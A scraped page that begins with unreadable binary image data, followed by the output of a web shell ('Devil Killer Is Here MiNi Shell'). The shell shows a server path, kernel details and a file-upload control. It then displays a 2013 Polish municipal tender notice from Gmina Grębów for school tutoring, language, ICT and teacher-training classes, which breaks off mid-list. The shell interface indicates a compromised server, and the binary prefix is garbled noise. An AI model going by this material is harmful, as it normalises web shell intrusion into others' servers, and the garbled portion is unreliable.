JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131002/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131002/202955-N-2013.html

<p class="kh_header"><b>Grębów: Zakup usług edukacyjnych i szkoleniowych obejmujących prowadzenie zajęć w ramach projektu pn. Z wiedzą za pan brat  współfinansowanego  ze środków Unii Europejskiej z  Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki</b><br>
<b>Numer ogłoszenia: 202955 - 2013; data zamieszczenia: 02.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Grębów , Grębów 394, 39-410 Grębów, woj. podkarpackie, tel. 15 8513764, 8112715, faks 15 8112805.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup usług edukacyjnych i szkoleniowych obejmujących prowadzenie zajęć w ramach projektu pn. Z wiedzą za pan brat  współfinansowanego  ze środków Unii Europejskiej z  Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Zakup usług edukacyjnych i szkoleniowych obejmujących prowadzenie zajęć w ramach projektu pn.Z wiedzą za pan brat .
Projekt jest współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX - Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 - Wyrównywanie szans edukacyjnych i zapewnienie wysokiej, jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie  9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych.

3.1. Przedmiot zamówienia podzielony został na 20 części w ramach 3 zadań: 
Zadanie I  Zajęcia rozwijające :
Cel zajęć rozwijających: - wzrost wiedzy o min.  40%  u min. 85% uczniów z zakresu poszczególnych przedmiotów objętych zajęciami rozwijającymi
- nauka samodzielności w dochodzeniu do rozwiązań, poszukiwaniu źródeł i wyciąganiu wniosków. Uczniowie pracują z różnymi źródłami wiedzy (Internet, podręcznik, doświadczenie) oraz uczą się wykorzystywać wiedzę w praktyce. 
Część1. Zajęcia rozwijające z języka polskiego w Szkole Podstawowej w Zabrniu: 1 grupa 60 godz. w r.szk. 2013/2014 oraz 1 grupa 60 godz. w r.sz. 2014/2015 (1x 2 godz. tygodniowo). 

Część 2.  Zajęcia rozwijające z matematyki w Szkole Podstawowej w Zabrniu:1 grupa 60 godz. w r.szk. 2013/2014 oraz 1 grupa 60 godz. w r.sz. 2014/2015 (1x 2 godz. tygodniowo)
Część 3. Zajęcia rozwijające z języka polskiego w Szkole Podstawowej w Żupawie: 1 grupa 60 godz. w r.szk. 2013/2014 oraz 1 grupa 60 godz. w r.sz. 2014/2015 (1x 2 godz. tygodniowo). 
Część 4.  Zajęcia rozwijające z matematyki w Szkole Podstawowej w Żupawie: 1 grupa 60 godz. w r.szk. 2013/2014  (1x 2 godz. tygodniowo)
Część 5. Zajęcia rozwijające z przyrody w Szkole Podstawowej w Żupawie: 1 grupa 60 godz. w r.szk. 2013/2014 oraz 1 grupa 60 godz. w r.sz. 2014/2015 (1x 2 godz. tygodniowo)
Część 6. Warsztatowe teatralne zajęcia edukacyjne w Szkole Podstawowej w Zabrniu: 
1 grupa 60 godz. w r.szk. 2013/2014 oraz 1 grupa 60 godz. w r.sz. 2014/2015 (1x 2 godz. tygodniowo).  
Cel warsztatów: nauka ruchu scenicznego i dykcji, przygotowanie 2 przedstawień (na zakończenie każdego roku szkolnego).
Część 7. Zajęcia z języka angielskiego w Szkole Podstawowej w Zabrniu: 1 grupa 90 godz.
 w r.szk. 2013/2014 oraz 1 grupa 90 godz. w r.sz. 2014/2015 (1x 1h, 1x2h, łącznie 3 godz. tygodniowo), wzbogacone komponentem elearningowym 10h/osobę  
Część 8. Zajęcia z języka angielskiego w Szkole Podstawowej w Żupawie: 1 grupa 90 godz. w r.szk. 2013/2014 oraz 1 grupa 90 godz. w r.sz. 2014/2015 (1x 1h, 1x2h, łącznie 3  godz. tygodniowo), wzbogacone komponentem elearningowym 10h/osobę  
Cel zajęć z j. angielskiego: doskonalenie praktycznej komunikacji
Warunki niezbędne do realizacji zajęć cz.7 i 8. Wykonawca zobowiązuje się: 
1)	Zapewnić nieodpłatnie uczestnikom w trakcie zajęć indywidualne materiały szkoleniowe odpowiadające zakresowi merytorycznemu modułów zajęciowych 
w postaci podręczników oraz słowników, umożliwiających samodzielną naukę realizowanych treści programowych zajęć; 
2)	Udostępnić materiały szkoleniowe na platformie e-learningowej umożliwiającej samodzielne pogłębianie wiedzy i doskonalenie umiejętności z zakresu prowadzonych zajęć w okresie ich realizacji oraz dodatkowo rok po zakończeniu zajęć.
Część 9. Zajęcia z języka angielskiego zakończone egzaminem zewnętrznym TELC w Szkole Podstawowej w Zabrniu: 1 grupa  120godz. w r.szk. 2013/2014 oraz 1 grupa 120 godz. w r.sz. 2014/2015 (2x 2 godz. tygodniowo)., wzbogacone komponentem e-learningowym 15h/ osobę.
Część 10. Zajęcia z języka angielskiego zakończone egzaminem zewnętrznym TELC 
w Szkole Podstawowej w Żupawie: 1 grupa  120godz. w r.szk. 2013/2014 (2x 2 godz. tygodniowo), wzbogacone komponentem e-learningowym 15h/ osobę.
Cel  zajęć z j. angielskiego: 
- minimum 70 % zdających uczniów zaliczy zewnętrzny egzamin TELC.
 -nabycie umiejętności praktycznej komunikacji w języku, podniesienie poziomu wiedzy o 1 stopień (np.z A1 na A2) 

Warunki niezbędne do realizacji zajęć cz.9 i 10. Wykonawca zobowiązuje się: 
1)	Przeprowadzić testy plasujące;
2)	Zapewnić nieodpłatnie uczestnikom w trakcie zajęć indywidualne materiały szkoleniowe odpowiadające zakresowi merytorycznemu modułów zajęciowych w postaci podręczników oraz słowników, umożliwiających samodzielną naukę realizowanych treści programowych zajęć; 
3)	Udostępnić materiały szkoleniowe na platformie e-learningowej umożliwiającej samodzielne pogłębianie wiedzy i doskonalenie umiejętności z zakresu prowadzonych zajęć w okresie ich realizacji oraz dodatkowo rok po zakończeniu zajęć.
4)	Zapewnić egzaminy certyfikacyjne dla wszystkich uczestników zajęć (19 osób) (EGZAMINATOREM NIE MOŻE BYĆ OSOBA PROWADZĄCA ZAJĘCIA)
5)	Wydać certyfikat wszystkim uczestnikom, którzy pomyślnie zdali egzaminy; 
Część 11. Zajęcia z zakresu ICT zakończone egzaminami zewnętrznymi w ramach ECDL- Start w Szkole Podstawowej w Zabrniu: dla 1 grupy w r.szk. 2013/2014 - dwa razy 
w tygodniu  po 2 godziny, łącznie 120 godz. uzupełnione komponentem e-learningowym 5h/osobę. 
Moduły:
1.	Przetwarzanie tekstów
2.	Grafika menedżerska i prezentacyjna
3.	Przeglądanie stron internetowych i komunikacja
4.	Arkusze kalkulacyjne 
Cel zajęć z zakresu ICT: minimum 70 % zdających uczniów zaliczy zewnętrzny egzamin  ECDL - Start.
Zajęcia muszą być przeprowadzone zgodnie ze standardami wyznaczonymi dla kursów ECDL START lub równoważnych. Podział godzinowy na poszczególne moduły określi Wykonawca bazując na swojej wiedzy i doświadczeniu w taki sposób, żeby jak najskuteczniej wykorzystać 120 h na grupę dla realizacji pełnego zakresu szkoleń.
Za równoważny Zamawiający uznaje kurs kończący się certyfikatem wydawanym 
i uznawanym, co najmniej we wszystkich państwach Unii Europejskiej, posiadający publicznie dostępną listę instytucji wydających go w tych krajach oraz udokumentowany system zapewnienia jakości. Celem zajęć jest nabycie przez jego uczestnika praktycznych umiejętności pozwalających na efektywne podejście do egzaminów z 4. modułów i uzyskanie certyfikatu ECDL Start. Wykonawca musi opłacić egzaminy oraz opłacić i zorganizować dojazd na egzaminy dla wszystkich uczestników zajęć. 
Warunki niezbędne do realizacji zajęć w cz.11. Wykonawca zobowiązuje się: 
1)	Zapewnić nieodpłatnie uczestnikom w trakcie zajęć indywidualne materiały szkoleniowe odpowiadające zakresowi merytorycznemu modułów zajęciowych 
w postaci podręczników, umożliwiających samodzielną naukę realizowanych treści programowych zajęć; 
2)	Udostępnić materiały szkoleniowe na platformie e-learningowej umożliwiającej samodzielne pogłębianie wiedzy i doskonalenie umiejętności z zakresu prowadzonych zajęć w okresie ich realizacji oraz dodatkowo rok po zakończeniu zajęć.
3)	Zorganizować egzaminy certyfikacyjne ECDL Start lub równoważne w sali posiadającej status Laboratorium ECDL lub równoważne, egzaminy 
z poszczególnych modułów dla 6 osób (w sumie 24 egzaminów) oraz do 25% ewentualnych egzaminów poprawkowych tj. do 6 ewentualnych egzaminów poprawkowych (EGZAMINATOREM NIE MOŻE BYĆ OSOBA PROWADZĄCA ZAJĘCIA); 
4)	Wydać certyfikat uznawany co najmniej we wszystkich państwach Unii Europejskiej, posiadający publicznie dostępną listę instytucji wydających go w tych krajach oraz udokumentowany system zapewnienia jakości (ECDL Start lub równoważny) wszystkim uczestnikom, którzy pomyślnie zdali wymagane egzaminy; 
5)	Zagwarantować, aby treści programów zajęć odpowiadały wymaganym zakresom merytorycznym (co najmniej treści opisane dla ECDL Start w programie Syllabus wersja 5.0 dostępnym na stronie Polskiego Towarzystwa Informatycznego: www.ecdl.com.pl)
Część 12. Opieka nad uczniami korzystającymi z platformy e-learningowej w ramach realizacji zajęć z języka angielskiego i ICT w Szkole Podstawowej w Zabrniu: 1 gr - 5 h 
z zakresu ICT, 1 gr z j. angielskiego - 10h w roku szk. 2013/2014, 1 gr z j. angielskiego - 10h w roku szk. 2014/2015, 1 gr z j. angielskiego - 15h w roku szk. 2013/2014, z j. angielskiego - 15h w roku szk. 2014/2015. Łącznie 30h w roku szk. 2013/2014 i 25h w roku szk. 2014/2015.

Część 13. Opieka nad uczniami korzystającymi z platformy e-learningowej w ramach realizacji zajęć z języka angielskiego w Szkole Podstawowej w Żupawie: 1 gr z j. angielskiego - 10h w roku szk. 2013/2014, 1 gr z j. angielskiego - 10h w roku szk. 2014/2015, 1 gr z j. angielskiego - 15h w roku szk. 2013/2014. Łącznie 25h w roku szk. 2013/2014 i 10 h w roku szk. 2014/2015.

Zadanie II	Zajęcia wyrównujące:
Cel zajęć wyrównujących: 
-wzrost wiedzy z przedmiotów dotychczas sprawiających uczniom problemy u minimum 85% uczestników zajęć
-zdiagnozowanie tematycznych obszarów problemowych, przezwyciężenie problemów, uzupełnienie wiedzy  w stosunku do wymagań programu, aktywizacja uczestników w celu zwiększenia motywacji do nauki.
Część 14. Zajęcia wyrównujące z języka polskiego w Szkole Podstawowej w Zabrniu:  1grupa 30 godz. w r.szk. 2013/2014 oraz 1 grupa 30 godz. w r.sz. 2014/2015 (1x 1 godz. tygodniowo).
Część 15. Zajęcia wyrównujące z matematyki w Szkole Podstawowej w Zabrniu:  1 grupa 30 godz. w r.szk. 2013/2014 oraz 1 grupa 30 godz. w r.sz. 2014/2015 (1x 1 godz. tygodniowo).
Część 16. Zajęcia wyrównujące z języka polskiego w Szkole Podstawowej w Żupawie:  
1 grupa 30 godz. w r.szk. 2013/2014 oraz 1 grupa 30 godz. w r.sz. 2014/2015 (1x 1 godz. tygodniowo).
Część 17. Zajęcia wyrównujące z matematyki w Szkole Podstawowej w Żupawie:  1 grupa 30 godz. w r.szk. 2013/2014 oraz 1 grupa 30 godz. w r.sz. 2014/2015 (1x 1 godz. tygodniowo).
Zadanie III 	Wsparcie pozostałe:
Część 18. Zajęcia terapii pedagogicznej w Szkole Podstawowej w Zabrniu:  1 grupa 30 godz. w r.szk. 2013/2014 oraz 1 grupa 30 godz. w r.sz. 2014/2015 (1x 1 godz. tygodniowo).
Cel: złagodzenie przyczyn utrudniających naukę u 80% uczestników zajęć  terapii pedagogicznej.
Zajęcia poświęcone doskonaleniu koncentracji na zadaniu, wypracowaniu umiejętności panowania nad emocjami oraz wypracowaniu indywidualnych technik uczenia się wspomagane współpracą z rodzicami.
Część 19. Zajęcia dla nauczycieli w Szkole Podstawowej w Zabrniu: posługiwanie się technikami ICT- dla 1 grupy (maks. 6 osób)  - 40 godz.  w okresie od X-XII.2013r.
Część 20. Zajęcia dla nauczycieli- posługiwanie się technikami ICT w Szkole Podstawowej 
w Żupawie - dla 1 grupy (maks. 6 osób) - 40 godz. w okresie od X-XII.2013r.
Tematyka dla cz. 19 i 20: obsługa komputera, posługiwanie się programami do obróbki tekstu, prezentacji, Internetem do przygotowania i prowadzenia zajęć, a także obsługi multimedialnych środków dydaktycznych, w tym tablicy interaktywnej (zakres treści należy dostosować do poziomu wiedzy i umiejętności uczestników, który należy ocenić poprzez diagnozę wstępną przeprowadzoną w postaci testu/ankiety)

Warunki niezbędne do realizacji zajęć w cz.19 i 20. Wykonawca zobowiązuje się: 
1) Opracować program szkolenia, który powinien zawierać m.in.:
opis treści, 
opis form i metod realizacji, 
opis konkretnych umiejętności przydatnych w pracy zawodowej nabywanych przez   uczestnika w czasie szkolenia,
formy oceniania pracy uczestników,
wykaz materiałów pomocniczych przewidzianych do realizacji przedsięwzięcia,
opis planowanej procedury ewaluacji wewnętrznej.

2) Zapewnić nieodpłatnie uczestnikom w trakcie zajęć indywidualne materiały szkoleniowe odpowiadające zakresowi merytorycznemu zajęć, 
3) Wydać imienne zaświadczenia o ukończeniu szkolenia 
3.3. Jedna godzina zajęć dla części od 1 do 17 oraz 19 i 20 rozumiana jest jako 45 minut 
(1 godzina lekcyjna), dla części 18 jako 60 minut.
3.4. Zamawiający udostępnia sale do przeprowadzenia zajęć.
3.5. Uczestnicy zajęć w cz. od 1 do 18 to uczniowie klas IV- VI szkoły podstawowej, w cz. 19 i 20 nauczyciele szkoły odpowiadającej danej części.
3.6. Liczebność grup ustalona przez Zamawiającego dla cz.1-18 nie przekracza maksymalnej liczby uczniów na zajęciach określonej w Rozporządzeniu Ministra Edukacji Narodowej 
w sprawie zasad udzielania i organizacji pomocy psychologiczno-pedagogicznej 
w publicznych przedszkolach, szkołach i placówkach.
3.7. Zajęcia będą odbywały się przed lub po obowiązkowych zajęciach dydaktycznych w dni powszednie, tj. od poniedziałku do piątku (w zależności od kształtującego się planu lekcji Uczestników Projektu). Zajęcia mogą odbywać się również w dniach wolnych od nauki szkolnej (soboty, ferie, itp.).

3.4. WYMAGANIA I OBOWIĄZKI DOTYCZĄCE WYKONAWCÓW W CZĘŚCIACH 1-20
3.4.1. Spełnienie wymogów dotyczących wykształcenia
3.4.2. Zastosowanie zasady równości płci w zależności od zdiagnozowanych potrzeb
w odniesieniu do problematyki projektu i jego uczestników.
3.4.3. Do zawarcia umowy wymagany jest harmonogram zajęć wskazanych w pkt. 3.2 SIWZ
3.4.4. Opracowanie i realizacja programów zajęć, ukierunkowanych na realizację celów Projektu.
3.4.5. Prowadzenie dokumentacji (m.in.dzienników zajęć, list obecności na zajęciach).
3.4.6. Sporządzanie sprawozdań z realizacji projektu, opracowywanie, przeprowadzanie 
i analiza testów kompetencji (badanie osiągnięć), sprawdzianów lub innej formy oceny dającej możliwości sprawdzenia przyrostu wiedzy i umiejętności uczniów objętych wsparciem.
3.4.7. Promocja i ewaluacja projektu - informowanie o współfinansowaniu projektu 
ze środków Europejskiego Funduszu Społecznego.
3.4.8. Ponoszenie odpowiedzialności materialnej za powierzone mienie.
3.4.9. Przestrzeganie regulaminu obowiązującego w pracowni, w której prowadzi zajęcia.
3.4.10. Decydowanie o doborze form, metod i środków dydaktycznych do prowadzenia zajęć.
3.4.11. Przestrzeganie Wytycznych dotyczących oznaczania projektu w ramach POKL.
3.4.12. Współpraca z zespołem projektowym.
3.4.13. Wykonywanie innych bieżących zadań niezbędnych do prawidłowej realizacji projektu.
3.4.14. Wykonawca zobowiązany jest do informowania Dyrektora Szkoły lub Sekretarza Szkolnego o wszelkich odstępstwach od harmonogramu realizacji zajęć.
3.4.15. Udostępnienie całej dokumentacji z zakresu realizacji umowy (np. prac dzieci wytworzonych w trakcie prowadzonych zajęć), na żądanie uprawnionego przedstawiciela Zamawiającego lub organom kontrolującym..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.50.00.00-9, 80.42.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 20.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca w celu spełnienia powyższego warunku musi wykazać, że dysponuje osobami spełniającymi następujące wymagania: 
Osoba prowadząca zajęcia musi posiadać kwalifikacje określone dla nauczyciela zgodnie z rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz.U.Nr 2009.50.400, Dz.U.2012.174, Dz.U.2012.426) 

Rodzaj zajęć	Kwalifikacje/Doświadczenie
Zajęcia rozwijające i wyrównujące z języka polskiego 	wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym, kwalifikacje do nauczania j.polskiego 
w szkole podstawowej
Zajęcia rozwijające i wyrównujące z matematyki 	wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym, kwalifikacje do nauczania matematyki 
w szkole podstawowej 
Zajęcia rozwijające z przyrody	wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym, kwalifikacje do nauczania przyrody  
w szkole podstawowej

Warsztatowe teatralne zajęcia edukacyjne 	wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym, kwalifikacje do nauczania j.polskiego, 
Zajęcia z języka angielskiego	wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym , kwalifikacje do nauczania j. angielskiego w szkole podstawowej w klasach IV-VI
Zajęcia z języka angielskiego zakończone egzaminem zewnętrznym TELC 
	wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym, kwalifikacje do nauczania j.angielskiego 
w szkole podstawowej
Zajęcia z zakresu ICT 	wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym, kwalifikacje do nauczania informatyki 
w szkole podstawowej

Opieka nad uczniami korzystającymi z platformy e-learningowej	wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym, kwalifikacje do nauczania informatyki 
w szkole podstawowej

Zajęcia terapii pedagogicznej	wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym, kwalifikacje do prowadzenia zajęć terapii pedagogicznej

Zajęcia dla nauczycieli:  posługiwanie się technikami ICT	wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym,  kwalifikacje do prowadzenia wskazanych zajęć.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

